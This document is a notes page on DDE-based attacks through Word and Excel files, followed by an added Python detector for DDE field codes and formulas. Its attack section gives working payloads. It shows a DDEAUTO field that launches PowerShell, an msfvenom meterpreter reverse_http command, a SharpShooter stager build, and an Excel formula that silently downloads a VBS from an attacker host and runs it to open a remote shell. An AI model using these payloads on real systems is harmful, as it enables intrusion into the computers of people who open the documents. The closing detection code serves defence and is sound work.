DDE Auto - Word/Excel

Intro

DDE (Dynamic Data Exchange) is an old Microsoft technology for transferring data between applications. It sends messages between the applications that share data and uses shared memory to exchange that data. DDE can be embedded in several Office file formats.

To leverage this attack vector:

Open a new MS document and insert a field

This adds "!Unexpected End of Formula" to the document. Right-click it and choose "Toggle field codes":

We then replace the = \* MERGEFORMAT with the payload:

{ DDEAUTO "C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\windows\system32\WindowsPowershell\v1.0\powershell.exe start calc # " "required"}

If we save the document, reopen it and accept the 2 prompts, Calculator pops up.

This attack has been tested on the latest Windows 10 LTSC edition with Microsoft Office 365 and an up-to-date Windows Defender.

Requirements:

  • Enabled Dynamic Data Exchange Server Lookup

  • Enabled Dynamic Data Exchange Server Launch

Warning presented to the user who opens the worksheet:

Exploitation

Generate shellcode with msfvenom:

msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=192.168.1.108 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f raw -o raw3.txt

Create a malicious VBS script with SharpShooter that embeds the raw3.txt shellcode file we generated earlier:

python2 SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo2 --rawscfile raw3.txt --amsi amsienable

Then inject the command into a Microsoft Excel formula:

=cmd|'/c cmd.exe /c powershell.exe -nop -w hidden iwr -outf %tmp%\\msf.vbs http://192.168.1.108:8000/foo2.vbs & %tmp%\\msf.vbs'!'A1'

After the user skips the warning, we get a meterpreter shell.
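
Detection side, as an added example (not part of the original notes): a triage check that flags DDE/DDEAUTO field codes in a .docx and DDE-style formulas in spreadsheet cell text. It goes beyond the single payload above by also handling field codes split across several runs and simple fields. The function names are hypothetical and the sample document is constructed.

```python
import io, re, zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{" + NS + "}"
DDE_FIELD = re.compile(r"\bDDE(AUTO)?\b", re.I)
# Cell text shaped like  =app|'topic'!'item'  (also +, - and @ formula prefixes)
DDE_FORMULA = re.compile(r"^\s*[=+\-@]\s*\w+\|.*!", re.S)

def field_instructions(xml_bytes):
    """Yield field-code strings from one WordprocessingML part."""
    root = ET.fromstring(xml_bytes)  # untrusted input: prefer defusedxml in production
    # A complex field's code can be split over several w:instrText runs
    # ("DDE" + "AUTO"), so join the runs of each paragraph before matching.
    for para in root.iter(W + "p"):
        joined = "".join(t.text or "" for t in para.iter(W + "instrText"))
        if joined.strip():
            yield joined
    # Simple fields keep the code in the w:instr attribute instead.
    for fld in root.iter(W + "fldSimple"):
        yield fld.get(W + "instr", "")

def scan_docx(data):
    """Return (part name, normalised field code) for every DDE/DDEAUTO field."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for code in field_instructions(z.read(name)):
                    if DDE_FIELD.search(code):
                        hits.append((name, " ".join(code.split())))
    return hits

def is_dde_formula(cell):
    """True when a spreadsheet cell's text looks like a DDE call."""
    return bool(DDE_FORMULA.match(cell))

def build_sample_docx(runs):
    """Constructed test input: a minimal .docx whose only paragraph is a field."""
    body = "".join(f"<w:r><w:instrText>{escape(r)}</w:instrText></w:r>" for r in runs)
    xml = f'<w:document xmlns:w="{NS}"><w:body><w:p>{body}</w:p></w:body></w:document>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", xml)
    return buf.getvalue()

if __name__ == "__main__":
    sample = build_sample_docx(["DDE", 'AUTO "example.exe" "constructed"'])
    print(scan_docx(sample))
```

A hit is a reason to quarantine and inspect the file, not a verdict: legitimate documents occasionally use DDE links, and other field-based obfuscation is not covered by this check.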
